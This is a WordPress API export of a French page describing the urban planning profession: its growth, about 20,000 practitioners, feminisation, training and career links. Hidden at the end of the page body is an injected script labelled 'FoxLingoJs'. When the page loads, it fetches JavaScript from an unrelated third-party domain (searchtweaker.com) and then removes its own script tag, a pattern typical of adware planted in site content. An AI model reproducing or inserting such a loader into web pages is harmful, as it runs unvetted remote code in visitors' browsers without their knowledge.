{"id":6,"date":"2011-02-17T10:51:36","date_gmt":"2011-02-17T10:51:36","guid":{"rendered":"http:\/\/www.jeunes-urbanistes.fr\/?page_id=6"},"modified":"2019-08-17T18:07:22","modified_gmt":"2019-08-17T16:07:22","slug":"profession-urbaniste","status":"publish","type":"page","link":"http:\/\/www.jeunes-urbanistes.fr\/?page_id=6","title":{"rendered":"la profession d&rsquo;urbaniste"},"content":{"rendered":"<p>La profession d\u2019urbaniste a connu en France un essor consid\u00e9rable au cours des trente derni\u00e8res ann\u00e9es. Les \u00e9tapes successives de d\u00e9centralisation et la mont\u00e9e en puissance de l\u2019intercommunalit\u00e9 dans la gouvernance des territoires ont profond\u00e9ment modifi\u00e9 la donne et renouvel\u00e9 les pratiques dans le domaine de l\u2019urbanisme.<\/p>\n<p>Aux c\u00f4t\u00e9s des \u00e9lus et des d\u00e9cideurs publics, <strong>les 20 000 urbanistes de France sont devenus des acteurs essentiels de la d\u00e9finition des strat\u00e9gies territoriales et des politiques publiques locales<\/strong>. Si la d\u00e9finition du r\u00f4le de l\u2019urbaniste tend \u00e0 se stabiliser, la reconnaissance de son statut et plus largement la structuration de la profession demeurent en revanche, aujourd\u2019hui encore, des chantiers de premi\u00e8re importance.<\/p>\n<p>L\u2019enjeu est de prendre acte des nombreuses \u00e9volutions intervenues au cours des derni\u00e8res d\u00e9cennies\u00a0: diversification des modes d\u2019exercice (marginalisation de l\u2019exercice lib\u00e9ral et mont\u00e9e du salariat)\u00a0; f\u00e9minisation de la profession (deux-tiers des jeunes urbanistes sont aujourd\u2019hui des femmes)\u00a0; sp\u00e9cialisation des domaines de comp\u00e9tences\u00a0; constitution d\u2019une fili\u00e8re autonome de formations en urbanisme au sein d\u2019instituts d\u2019urbanisme et d\u2019am\u00e9nagement du territoire dans plusieurs r\u00e9gions fran\u00e7aises.<\/p>\n<ul>\n<li><a href=\"http:\/\/www.jeunes-urbanistes.fr\/?page_id=37\"><strong>Les domaines d&rsquo;activit\u00e9 et les comp\u00e9tences des urbanistes<\/strong><\/a><\/li>\n<\/ul>\n<ul>\n<li><strong><a href=\"http:\/\/www.jeunes-urbanistes.fr\/?page_id=27\">Se former<\/a> <\/strong><\/li>\n<\/ul>\n<ul>\n<li><a href=\"http:\/\/www.jeunes-urbanistes.fr\/?page_id=51\"><strong>Travailler<\/strong><\/a><\/li>\n<\/ul>\n<ul>\n<li><a href=\"http:\/\/www.jeunes-urbanistes.fr\/?page_id=33\" target=\"_blank\"><strong>L&rsquo;organisation professionnelle<\/strong><\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ <![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La profession d\u2019urbaniste a connu en France un essor consid\u00e9rable au cours des trente derni\u00e8res ann\u00e9es. Les \u00e9tapes successives de d\u00e9centralisation et la mont\u00e9e en&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=\/wp\/v2\/pages\/6"}],"collection":[{"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6"}],"version-history":[{"count":27,"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=\/wp\/v2\/pages\/6\/revisions"}],"predecessor-version":[{"id":3869,"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=\/wp\/v2\/pages\/6\/revisions\/3869"}],"wp:attachment":[{"href":"http:\/\/www.jeunes-urbanistes.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}